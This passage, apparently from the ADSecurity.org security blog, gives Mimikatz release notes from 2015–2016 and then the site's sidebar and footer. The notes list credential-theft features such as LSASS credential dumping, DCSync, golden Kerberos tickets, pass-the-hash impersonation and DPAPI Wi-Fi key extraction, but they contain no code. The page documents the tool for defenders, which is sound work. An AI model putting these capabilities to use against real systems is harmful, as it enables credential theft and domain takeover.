module now handles more Vault types, Attributes and Properties (with /attributes)<br /> [new] misc::compressme to create a compressed version of mimikatz<br /> [new] dpapi::cred now handles legacy (NT5) multiple credentials<br /> [new] dpapi::wifi &amp; dpapi::wwan to deal with network profiles<br /> [internal] kuhl_m_vault: vault::list now deals with SID / credentials attributes (with one incorrect align.)<br /> [internal] kull_m_string: removed unused kull_m_string_suspectUnicodeStringStructure<br /> [internal] kull_m_string: added kull_m_string_printSuspectUnicodeString<br /> [internal] kull_m_string: added dirty kull_m_string_quickxml_simplefind<br /> [internal] kull_m_memory: quick compress &amp; decompress routines<br /> [internal] kull_m_dpapi: added blob flags descriptions<br /> [internal] kull_m_dpapi: fixed blob protection flags description for system<br /> [internal] kull_m_dpapi: removed unused kull_m_dpapi_unprotect_backupkey_with_secret<br /> [internal] kull_m_cred: added legacy (NT5) credentials structures &amp; routines</p> <p><strong>Mimikatz Release Date: 1/31/2016</strong><br /> Lots of internals and 2003 SP1 support<br /> [new] sekurlsa module and its kerberos submodule now work with old 2003 SP1 (live or dump)<br /> [remove] misc::wifi with WLanAPI will be replaced with dpapi::wifi raw access<br /> [fix] crypto::certificate buffer free at the right place<br /> [internal] new kull_m_file Find function with callback<br /> [internal] removed kull_m_file functions (read/write/file exist) with environment-variables, now used for all command-lines<br /> [internal] kull_m_crypto_hash better checks for CRC32 trick<br /> [internal] mimilove for Windows 2000 banner update<br /> [internal] crypto::system now works with buffers (for future registry access)<br /> [internal] kerberos::ptt &amp; crypto::system call kull_m_file_Find instead of their own implementation<br /> [internal] remove CrtlHandler, from mimikatz main modules, when exiting to let 
PowerShell clean<br /> [internal] expand command lines environment-variables from mimikatz main modules</p> <p><strong>Mimikatz Release Date: 1/16/2016</strong><br /> Crypto, crypto everywhere&#8230;<br /> [new] crypto::providers and crypto::certificates now list provider types<br /> [internal] Removed kull_m_crypto_crc32 routine from crypto module, relies now on cryptdll using CALG_CRC32 with kull_m_crypto_hash<br /> [internal] Removed incorrect usage of BOOL instead of NTSTATUS in kuhl_m_pac_validationInfo_to_PAC</p> <p><strong>Mimikatz Release Date: 1/11/2016</strong><br /> Crypto &amp; Kerberos enhancements<br /> [fix] dpapi::capi now deals with AT_SIGNATURE keys<br /> [fix] sekurlsa::kerberos / kerberos:: encryption type are now signed<br /> [new] kerberos::ask to ask / save TGS from current TGT<br /> [new] crypto::system to describe/to export Windows System Certificate (cert, crl, ctl, keyid)<br /> [internal] smaller banner for smaller displays<br /> [internal] Copyrights for 2016<br /> [internal] kull_m_file can deal with environment-variable strings in paths<br /> [internal] kull_m_crypto new types for CERT_PROP_*_ID.</p> <p><strong>Mimikatz Release Date: 1/05/2016</strong><br /> MSV &amp; Kerberos fixes, LSA and Privilege enhancements<br /> [fix] sekurlsa::msv &amp; mimilib for Windows 10 build 10586<br /> [fix #20] sekurlsa::tickets (display &amp; export) for NT 6 != Windows 10<br /> [close #16] kerberos::golden now with ~NetBios name in LogonDomainName field of the PAC<br /> [new] privilege module shortcuts (driver, security, tcb, backup, restore) and functions (by id or name)<br /> [new] lsadump::dcsync and lsadump::lsa /inject &#8216;NTLM-Strong-NTOWF&#8217; in Supplemental Credentials structures (Windows 2016 TP 4)<br /> [internal] NtSetSystemInformation can now be used in code</p> <p><strong>Mimikatz Release Date: 11/12/2015</strong><br /> mimikatz &amp; mimilib sekurlsa module ready for Windows 10 build 10586</p> <p><strong>Mimikatz Release Date: 
11/09/2015</strong><br /> mimikatz: updated to build with hid.lib</p> <p><strong>Mimikatz Release Date: 10/08/2015</strong><br /> Kiwi &amp; René Coty BusyLight mode</p> <p><strong>Mimikatz Release Date: 10/04/2015</strong><br /> mimikatz + mimilib sekurlsa fix for SmartCard informations</p> <p><strong>Mimikatz Release Date: 9/29/2015</strong><br /> sekurlsa::kerberos &#8211; Fix SmartCard pin code</p> <p><strong>Mimikatz Release Date: 9/26/2015</strong><br /> sekurlsa::pth Auto-impersonation (/impersonate)</p> <p><strong>Mimikatz Release Date: 9/16/2015</strong><br /> lsadump::dcsync fix for with 2012r2 AD Recycle Bin<br /> Thank you to @asolino, @mubix &amp; @carnal0wnage !</p> <p><strong>Mimikatz Release Date: 9/06/2015</strong><br /> Enhancements<br /> * Code cleaning</p> <p><strong>Mimikatz Release Date: 9/01/2015</strong><br /> kerberos::golden : fix for groups printing.<br /> lsadump::dcsync autoselect a domain controller with Directory Service<br /> (DIRECTORY_SERVICE)</p> <p><strong>Mimikatz Release Date: 8/30/2015</strong><br /> Cleaning &amp; few Win10 adaptations</p> <p><strong>Mimikatz Release Date: 8/25/2015</strong><br /> Licence fix on one missed file by AnkhSVN 😉<br /> Global licence update, credits to Vincent LE TOUX for DCSync, and lsadump::hash moved to crypto::hash</p> <p>&nbsp;</p> <p>&nbsp;</p> <p><strong><em>This page and all content Copyright </em>© 2015-2016 <em>Sean Metcalf (ADSecurity.org).</em> All Rights Reserved. 
No warranty is implied or provided.<br /> </strong></p> </div> </div> </div> </div><!-- #content-main -->
tag-link-position-27" style="font-size: 11.175257731959pt;" aria-label="MS14068 (9 items)">MS14068</a> <a href="https://adsecurity.org/?tag=passthehash" class="tag-cloud-link tag-link-44 tag-link-position-28" style="font-size: 9.7319587628866pt;" aria-label="PassTheHash (7 items)">PassTheHash</a> <a href="https://adsecurity.org/?tag=powershell" class="tag-cloud-link tag-link-575 tag-link-position-29" style="font-size: 18.536082474227pt;" aria-label="PowerShell (31 items)">PowerShell</a> <a href="https://adsecurity.org/?tag=powershellcode" class="tag-cloud-link tag-link-22 tag-link-position-30" style="font-size: 14.927835051546pt;" aria-label="PowerShellCode (17 items)">PowerShellCode</a> <a href="https://adsecurity.org/?tag=powershellhacking" class="tag-cloud-link tag-link-68 tag-link-position-31" style="font-size: 8pt;" aria-label="PowerShellHacking (5 items)">PowerShellHacking</a> <a href="https://adsecurity.org/?tag=powershellv5" class="tag-cloud-link tag-link-69 tag-link-position-32" style="font-size: 8pt;" aria-label="PowerShellv5 (5 items)">PowerShellv5</a> <a href="https://adsecurity.org/?tag=powersploit" class="tag-cloud-link tag-link-232 tag-link-position-33" style="font-size: 10.453608247423pt;" aria-label="PowerSploit (8 items)">PowerSploit</a> <a href="https://adsecurity.org/?tag=presentation" class="tag-cloud-link tag-link-422 tag-link-position-34" style="font-size: 9.7319587628866pt;" aria-label="Presentation (7 items)">Presentation</a> <a href="https://adsecurity.org/?tag=security" class="tag-cloud-link tag-link-576 tag-link-position-35" style="font-size: 8pt;" aria-label="Security (5 items)">Security</a> <a href="https://adsecurity.org/?tag=silverticket" class="tag-cloud-link tag-link-304 tag-link-position-36" style="font-size: 11.175257731959pt;" aria-label="SilverTicket (9 items)">SilverTicket</a> <a href="https://adsecurity.org/?tag=sneakyadpersistence" class="tag-cloud-link tag-link-596 tag-link-position-37" style="font-size: 9.0103092783505pt;" 
aria-label="SneakyADPersistence (6 items)">SneakyADPersistence</a> <a href="https://adsecurity.org/?tag=spn" class="tag-cloud-link tag-link-294 tag-link-position-38" style="font-size: 9.0103092783505pt;" aria-label="SPN (6 items)">SPN</a> <a href="https://adsecurity.org/?tag=tgs" class="tag-cloud-link tag-link-528 tag-link-position-39" style="font-size: 9.0103092783505pt;" aria-label="TGS (6 items)">TGS</a> <a href="https://adsecurity.org/?tag=tgt" class="tag-cloud-link tag-link-529 tag-link-position-40" style="font-size: 9.0103092783505pt;" aria-label="TGT (6 items)">TGT</a> <a href="https://adsecurity.org/?tag=windows7" class="tag-cloud-link tag-link-117 tag-link-position-41" style="font-size: 8pt;" aria-label="Windows7 (5 items)">Windows7</a> <a href="https://adsecurity.org/?tag=windows10" class="tag-cloud-link tag-link-494 tag-link-position-42" style="font-size: 10.453608247423pt;" aria-label="Windows10 (8 items)">Windows10</a> <a href="https://adsecurity.org/?tag=windowsserver2008r2" class="tag-cloud-link tag-link-46 tag-link-position-43" style="font-size: 9.0103092783505pt;" aria-label="WindowsServer2008R2 (6 items)">WindowsServer2008R2</a> <a href="https://adsecurity.org/?tag=windowsserver2012" class="tag-cloud-link tag-link-47 tag-link-position-44" style="font-size: 11.175257731959pt;" aria-label="WindowsServer2012 (9 items)">WindowsServer2012</a> <a href="https://adsecurity.org/?tag=windowsserver2012r2" class="tag-cloud-link tag-link-54 tag-link-position-45" style="font-size: 9.7319587628866pt;" aria-label="WindowsServer2012R2 (7 items)">WindowsServer2012R2</a></div> </div><div id="search-2" class="sidebar-wrap widget_search"><form class="searchform" method="get" action="https://adsecurity.org"> <div class="input-group"> <div class="form-group live-search-input"> <label for="s" class="screen-reader-text">Search for:</label> <input type="text" id="s" name="s" class="form-control" placeholder="Search"> </div> <span class="input-group-btn"> <button class="btn 
btn-default" type="submit"><i class="fa fa-search"></i></button> </span> </div> </form></div> <div id="recent-posts-2" class="sidebar-wrap widget_recent_entries"> <h3>Recent Posts</h3> <ul> <li> <a href="https://adsecurity.org/?p=4436">BSides Dublin &#8211; The Current State of Microsoft Identity Security: Common Security Issues and Misconfigurations &#8211; Sean Metcalf</a> </li> <li> <a href="https://adsecurity.org/?p=4434">DEFCON 2017: Transcript &#8211; Hacking the Cloud</a> </li> <li> <a href="https://adsecurity.org/?p=4432">Detecting the Elusive: Active Directory Threat Hunting</a> </li> <li> <a href="https://adsecurity.org/?p=4430">Detecting Kerberoasting Activity</a> </li> <li> <a href="https://adsecurity.org/?p=4428">Detecting Password Spraying with Security Event Auditing</a> </li> </ul> </div><div id="recent-comments-2" class="sidebar-wrap widget_recent_comments"><h3>Recent Comments</h3><ul id="recentcomments"><li class="recentcomments"><span class="comment-author-link">Derek</span> on <a href="https://adsecurity.org/?p=3592#comment-13603">Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory</a></li><li class="recentcomments"><span class="comment-author-link"><a href="https://ADSecurity.org" class="url" rel="ugc">Sean Metcalf</a></span> on <a href="https://adsecurity.org/?p=3782#comment-13545">Securing Microsoft Active Directory Federation Server (ADFS)</a></li><li class="recentcomments"><span class="comment-author-link">Brad</span> on <a href="https://adsecurity.org/?p=3782#comment-13544">Securing Microsoft Active Directory Federation Server (ADFS)</a></li><li class="recentcomments"><span class="comment-author-link">Joonas</span> on <a href="https://adsecurity.org/?p=3719#comment-13229">Gathering AD Data with the Active Directory PowerShell Module</a></li><li class="recentcomments"><span class="comment-author-link"><a href="https://ADSecurity.org" class="url" rel="ugc">Sean Metcalf</a></span> on <a 
href="https://adsecurity.org/?p=3719#comment-13215">Gathering AD Data with the Active Directory PowerShell Module</a></li></ul></div><div id="archives-2" class="sidebar-wrap widget_archive"><h3>Archives</h3> <ul> <li><a href='https://adsecurity.org/?m=202406'>June 2024</a></li> <li><a href='https://adsecurity.org/?m=202405'>May 2024</a></li> <li><a href='https://adsecurity.org/?m=202005'>May 2020</a></li> <li><a href='https://adsecurity.org/?m=202001'>January 2020</a></li> <li><a href='https://adsecurity.org/?m=201908'>August 2019</a></li> <li><a href='https://adsecurity.org/?m=201903'>March 2019</a></li> <li><a href='https://adsecurity.org/?m=201902'>February 2019</a></li> <li><a href='https://adsecurity.org/?m=201810'>October 2018</a></li> <li><a href='https://adsecurity.org/?m=201808'>August 2018</a></li> <li><a href='https://adsecurity.org/?m=201805'>May 2018</a></li> <li><a href='https://adsecurity.org/?m=201801'>January 2018</a></li> <li><a href='https://adsecurity.org/?m=201711'>November 2017</a></li> <li><a href='https://adsecurity.org/?m=201708'>August 2017</a></li> <li><a href='https://adsecurity.org/?m=201706'>June 2017</a></li> <li><a href='https://adsecurity.org/?m=201705'>May 2017</a></li> <li><a href='https://adsecurity.org/?m=201702'>February 2017</a></li> <li><a href='https://adsecurity.org/?m=201701'>January 2017</a></li> <li><a href='https://adsecurity.org/?m=201611'>November 2016</a></li> <li><a href='https://adsecurity.org/?m=201610'>October 2016</a></li> <li><a href='https://adsecurity.org/?m=201609'>September 2016</a></li> <li><a href='https://adsecurity.org/?m=201608'>August 2016</a></li> <li><a href='https://adsecurity.org/?m=201607'>July 2016</a></li> <li><a href='https://adsecurity.org/?m=201606'>June 2016</a></li> <li><a href='https://adsecurity.org/?m=201604'>April 2016</a></li> <li><a href='https://adsecurity.org/?m=201603'>March 2016</a></li> <li><a href='https://adsecurity.org/?m=201602'>February 2016</a></li> <li><a 
href='https://adsecurity.org/?m=201601'>January 2016</a></li> <li><a href='https://adsecurity.org/?m=201512'>December 2015</a></li> <li><a href='https://adsecurity.org/?m=201511'>November 2015</a></li> <li><a href='https://adsecurity.org/?m=201510'>October 2015</a></li> <li><a href='https://adsecurity.org/?m=201509'>September 2015</a></li> <li><a href='https://adsecurity.org/?m=201508'>August 2015</a></li> <li><a href='https://adsecurity.org/?m=201507'>July 2015</a></li> <li><a href='https://adsecurity.org/?m=201506'>June 2015</a></li> <li><a href='https://adsecurity.org/?m=201505'>May 2015</a></li> <li><a href='https://adsecurity.org/?m=201504'>April 2015</a></li> <li><a href='https://adsecurity.org/?m=201503'>March 2015</a></li> <li><a href='https://adsecurity.org/?m=201502'>February 2015</a></li> <li><a href='https://adsecurity.org/?m=201501'>January 2015</a></li> <li><a href='https://adsecurity.org/?m=201412'>December 2014</a></li> <li><a href='https://adsecurity.org/?m=201411'>November 2014</a></li> <li><a href='https://adsecurity.org/?m=201410'>October 2014</a></li> <li><a href='https://adsecurity.org/?m=201409'>September 2014</a></li> <li><a href='https://adsecurity.org/?m=201408'>August 2014</a></li> <li><a href='https://adsecurity.org/?m=201407'>July 2014</a></li> <li><a href='https://adsecurity.org/?m=201406'>June 2014</a></li> <li><a href='https://adsecurity.org/?m=201405'>May 2014</a></li> <li><a href='https://adsecurity.org/?m=201404'>April 2014</a></li> <li><a href='https://adsecurity.org/?m=201403'>March 2014</a></li> <li><a href='https://adsecurity.org/?m=201402'>February 2014</a></li> <li><a href='https://adsecurity.org/?m=201307'>July 2013</a></li> <li><a href='https://adsecurity.org/?m=201211'>November 2012</a></li> <li><a href='https://adsecurity.org/?m=201203'>March 2012</a></li> <li><a href='https://adsecurity.org/?m=201202'>February 2012</a></li> </ul> </div><div id="categories-2" class="sidebar-wrap widget_categories"><h3>Categories</h3> 
<ul> <li class="cat-item cat-item-565"><a href="https://adsecurity.org/?cat=565">ActiveDirectorySecurity</a> </li> <li class="cat-item cat-item-55"><a href="https://adsecurity.org/?cat=55">Apple Security</a> </li> <li class="cat-item cat-item-431"><a href="https://adsecurity.org/?cat=431">Cloud Security</a> </li> <li class="cat-item cat-item-17"><a href="https://adsecurity.org/?cat=17">Continuing Education</a> </li> <li class="cat-item cat-item-396"><a href="https://adsecurity.org/?cat=396">Entertainment</a> </li> <li class="cat-item cat-item-347"><a href="https://adsecurity.org/?cat=347">Exploit</a> </li> <li class="cat-item cat-item-1039"><a href="https://adsecurity.org/?cat=1039">Hacking</a> </li> <li class="cat-item cat-item-168"><a href="https://adsecurity.org/?cat=168">Hardware Security</a> </li> <li class="cat-item cat-item-172"><a href="https://adsecurity.org/?cat=172">Hypervisor Security</a> </li> <li class="cat-item cat-item-126"><a href="https://adsecurity.org/?cat=126">Linux/Unix Security</a> </li> <li class="cat-item cat-item-343"><a href="https://adsecurity.org/?cat=343">Malware</a> </li> <li class="cat-item cat-item-11"><a href="https://adsecurity.org/?cat=11">Microsoft Security</a> </li> <li class="cat-item cat-item-819"><a href="https://adsecurity.org/?cat=819">Mitigation</a> </li> <li class="cat-item cat-item-48"><a href="https://adsecurity.org/?cat=48">Network/System Security</a> </li> <li class="cat-item cat-item-7"><a href="https://adsecurity.org/?cat=7">PowerShell</a> </li> <li class="cat-item cat-item-698"><a href="https://adsecurity.org/?cat=698">RealWorld</a> </li> <li class="cat-item cat-item-21"><a href="https://adsecurity.org/?cat=21">Security</a> </li> <li class="cat-item cat-item-234"><a href="https://adsecurity.org/?cat=234">Security Conference Presentation/Video</a> </li> <li class="cat-item cat-item-1045"><a href="https://adsecurity.org/?cat=1045">Security Recommendation</a> </li> <li class="cat-item cat-item-24"><a 
href="https://adsecurity.org/?cat=24">Technical Article</a> </li> <li class="cat-item cat-item-4"><a href="https://adsecurity.org/?cat=4">Technical Reading</a> </li> <li class="cat-item cat-item-2"><a href="https://adsecurity.org/?cat=2">Technical Reference</a> </li> <li class="cat-item cat-item-156"><a href="https://adsecurity.org/?cat=156">TheCloud</a> </li> <li class="cat-item cat-item-930"><a href="https://adsecurity.org/?cat=930">Vulnerability</a> </li> </ul> </div><div id="meta-2" class="sidebar-wrap widget_meta"><h3>Meta</h3> <ul> <li><a href="https://adsecurity.org/wp-login.php">Log in</a></li> <li><a href="https://adsecurity.org/?feed=rss2">Entries feed</a></li> <li><a href="https://adsecurity.org/?feed=comments-rss2">Comments feed</a></li> <li><a href="https://wordpress.org/">WordPress.org</a></li> </ul> </div> </div><!-- #sidebar1 --> </div><!-- #content --> <div id="sidebar_bottom" class="sidebar widget-area row footer-widget-col-3"> <div id="text-2" class="sidebar-wrap widget_text col-sm-4"><h3>Copyright</h3> <div class="textwidget">Content Disclaimer: This blog and its contents are provided "AS IS" with no warranties, and they confer no rights. Script samples are provided for informational purposes only and no guarantee is provided as to functionality or suitability. The views shared on this blog reflect those of the authors and do not represent the views of any companies mentioned. Content Ownership: All content posted here is intellectual work and under the current law, the poster owns the copyright of the article. Terms of Use Copyright © 2011 - 2020.</div> </div> </div> <div id="footer" class="row default-footer"> <div class="copyright-developer"> <div id="copyright"> <p>Content Disclaimer: This blog and its contents are provided "AS IS" with no warranties, and they confer no rights. Script samples are provided for informational purposes only and no guarantee is provided as to functionality or suitability. 
The views shared on this blog reflect those of the authors and do not represent the views of any companies mentioned. </p> </div> <div id="developer"> <p> Made with <i class="fa fa-heart"></i> by <a href="https://www.graphene-theme.com/" rel="nofollow">Graphene Themes</a>. </p> </div> </div> </div><!-- #footer --> </div><!-- #container --> <!-- Start of StatCounter Code --> <script> <!-- var sc_project=10100711; var sc_security="4b306538"; var sc_invisible=1; var scJsHost = (("https:" == document.location.protocol) ? "https://secure." : "http://www."); //--> </script> <script type="text/javascript" src="https://secure.statcounter.com/counter/counter.js" async></script> <noscript><div class="statcounter"><a title="web analytics" href="https://statcounter.com/"><img class="statcounter" src="https://c.statcounter.com/10100711/0/4b306538/1/" alt="web analytics" /></a></div></noscript> <!-- End of StatCounter Code --> <a href="#" id="back-to-top" title="Back to top"><i class="fa fa-chevron-up"></i></a> <script type="text/javascript" id="tptn_tracker-js-extra"> /* <![CDATA[ */ var ajax_tptn_tracker = {"ajax_url":"https:\/\/adsecurity.org\/wp-admin\/admin-ajax.php","top_ten_id":"1821","top_ten_blog_id":"1","activate_counter":"11","top_ten_debug":"0","tptn_rnd":"1585371937"}; /* ]]> */ </script> <script type="text/javascript" src="https://adsecurity.org/wp-content/plugins/top-10/includes/js/top-10-tracker.min.js?ver=1.0" id="tptn_tracker-js"></script> <script defer type="text/javascript" src="https://adsecurity.org/wp-includes/js/comment-reply.min.js?ver=6.5.5" id="comment-reply-js" async="async" data-wp-strategy="async"></script> </body> </html>

Pages: 1 2 3 4 5 6 7 8 9 10